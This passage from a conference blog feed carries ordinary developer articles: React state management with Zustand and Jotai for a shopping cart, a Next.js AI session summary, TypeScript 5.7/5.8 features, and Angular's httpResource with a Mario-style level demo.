          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still with the useCart function. The useAddToCart function creates a new function that you can pass a new updated item from the shopping cart to. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the application’s state management’s business logic. Therefore, libraries exist and “state” is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of the state of an application. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. The stores are the central element, which are created with the create function. They hold the state and provide methods for modification. In your application’s components, you can interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and gives the option of storing the state in the browser’s LocalStorage or IndexedDb via middleware. We don’t have to go that far for shopping cart management implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

function saveCartToServer(cartItems: CartItem[]): void {
  fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

The create function of state is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Work with state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function and use the cartItems structure to access the data in the store and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about State is that you don’t have to worry about integrating a provider. That’s because State doesn’t rely on React’s Context API to manage global state. One disadvantage is that State is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and the interfaces to it are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. Connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly, since you use the derived atoms for write operations. The useSetAtom function is used for this. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else. This is also true when updating all components affected by the atom change.

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. Both libraries take different approaches. Zustand offers a compact solution that concentrates both the structure and logic in one structure. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

🔍 Frequently Asked Questions (FAQ)

1. What are common reasons for implementing central state management in React?

Central state management is often necessary due to the component-based architecture of single-page applications. It enables efficient data sharing between deeply nested components without passing props through intermediate layers.

2. How does React’s Context API facilitate central state management?

The Context API allows React components to access shared state directly, bypassing the need to pass data through the component tree. This improves reusability and reduces coupling between components.

3. What are typical use cases for central state management in frontend applications?

Use cases include applications involving data record management such as e-commerce carts, address books, fleet management, and smart home systems. These scenarios require consistent, shared data access across multiple components.

4. How can you implement state management using only React without external libraries?

You can use a combination of useState and the Context API to manage and distribute state throughout the component tree. This lightweight method avoids additional dependencies but may require more boilerplate.

5. What are the advantages and limitations of Redux for state management?

Redux offers powerful state control and is suitable for large-scale applications, especially with tools like Redux Toolkit. However, it can introduce unnecessary overhead for smaller projects.

6. How does the useReducer hook enhance state logic separation?

The useReducer hook enables state manipulation through pure functions and action objects, improving code clarity and testability. It also allows the introduction of middleware for handling asynchronous actions.

7. What benefits does Zustand offer over React’s built-in state tools?

Zustand simplifies state logic by consolidating state and actions into centralized stores, avoiding the need for context providers. It supports asynchronous operations and optional local persistence via middleware.

8. How does Jotai manage state differently than Zustand?

Jotai uses atomic state units called atoms and provides fine-grained state control with minimal coupling. It emphasizes modularity and composability, which can lead to cleaner, more scalable code structures.

9. When should you choose Zustand or Jotai over native React state solutions?

Libraries like Zustand and Jotai are ideal when you want to reduce boilerplate, avoid prop drilling, and need a lightweight but scalable alternative to Redux. The choice depends on project complexity and team preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The Session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

iJS Newsletter

Keep up with JavaScript’s latest news!

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
   // Vergessen, 'result' zuzuweisen
 }
 printResult();
 function printResult() {
   console.log(result); // kein Compiler-Error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 2: Optimistic type check in different functional contexts

function foo() {
 let result: number
 // Weitere Logik, in der keine Zuweisung an 'result' erfolgt

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (or composite, ‘computed’) property names are consistently treated as index signatures in classes. This is shown in Listing 3 using a method that was created using an index signature.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Wird interpretiert als
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via compiler flag: –target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (‘restock’). The function “Object.groupBy()” is now passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the GroupBy function is an object (here the variable “result”) that contains the different groups as parameters. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Arrays gruppieren mittels Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays mit generischem Buffer-Typ

// Neu: TypedArray mit generischem ArrayBuffer-Typ
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Verwendung mit einem konkreten Typen:
// Hier SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exisitiert nur auf SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that enable TypeScript files to be executed directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “–experimental-strip-types”). Direct execution of TypeScript can speed up development processes, for example, by skipping the build/compile task between development and execution and “catching up” later. This becomes possible when relative imports are adjusted: Normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing the file directly without translation requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “–rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts.tsx.mts.cts to .js.jsx.mjs.cjs). On the one hand, this provides better support for direct execution. On the other hand, it is also possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step, but also need the real TypeScript build before publishing the library.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Listing 6: Import with .ts extension

import {Demo} from './bar'; //<-Standard-Import
import {Demo} from './bar.ts'; //<-Zum direkten Ausführen nötig

If the Node.js option “–experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy to remove (strip) for Node.js are used. To better support this use case, the new compiler option “–erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “–erasableSyntaxOnly”

// error: Namespace mit Runtime-Code
namespace container {
}

class Point {
 // error: Implizite Properties/Parameter-Properties
 constructor(public x: number, public y: number) { }
}

// error: Enum-Deklaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it naturally also uses all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-**” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. The check for such library packages was always performed previously, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “–libReplacement=false*,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the project is now searched further up if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript runtime is to be completely rewritten in Go for version 7. Initial tests have shown that with the help of the new compiler written in Go, it is possible to achieve up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the –experimental-strip-types flag. New compiler options like –rewriteRelativeImportExtensions and –erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the –erasableSyntaxOnly compiler option do?
The –erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworldundergroundunderwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Level 1 in Overworld style

Figure 1: Level 1 in overworld style

Level 1 in the Underground style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient in the substructure enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

iJS Newsletter

Keep up with JavaScript’s latest news!

Level files

The different levels are described by our example JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. An overview.json file is provided with these level files, which provides information about the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to generate a calculated signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a calculated signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Section of the tilemap used in the example

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information and uses the example to display the progress information to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Reactive flow of ngMario

Figure 4: Reactive flow of ngMario

The signals levelKeystyle, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilesmap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signal and passes them to the engine’s animateLevel or rederLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
